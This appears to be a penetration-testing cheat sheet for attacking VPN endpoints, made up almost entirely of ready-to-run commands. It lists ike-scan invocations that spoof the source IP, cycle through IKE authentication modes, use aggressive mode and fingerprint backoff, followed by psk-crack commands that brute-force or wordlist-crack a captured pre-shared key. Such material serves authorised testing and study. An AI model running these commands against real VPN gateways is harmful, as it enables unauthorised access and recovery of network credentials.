VPNs

Resources

Techniques

IKEv2 authentication with IP spoofing

ike-scan --sport=1723 --dport=1723 --sourceip=IP_To_Spoof --ikev2 <IP>

Trying all authentication modes

ike-scan --dport=1723 --auth=1 <IP>
ike-scan --dport=1723 --auth=3 <IP>
ike-scan --dport=1723 --auth=64221 <IP>

IP spoofing using ike-scan

ike-scan --dport=1723 --sourceip=IP_To_Spoof  --auth=1 <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof  --auth=3 <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof  --auth=64221 <IP>

IP spoofing and aggressive mode

ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=1 <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=3 <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=64221 <IP>

Show backoff fingerprint

ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=1 --showbackoff <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=3 --showbackoff <IP>
ike-scan --dport=1723 --sourceip=IP_To_Spoof -A --auth=64221 --showbackoff <IP>

Crack the key using psk-crack

# hash-file.txt is the PSK parameters file saved from the handshake with ike-scan -P (--pskcrack);
# psk-crack works on that file, not on a host address
psk-crack hash-file.txt
psk-crack -b 5 hash-file.txt
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" hash-file.txt
psk-crack -d wordlist.txt hash-file.txt
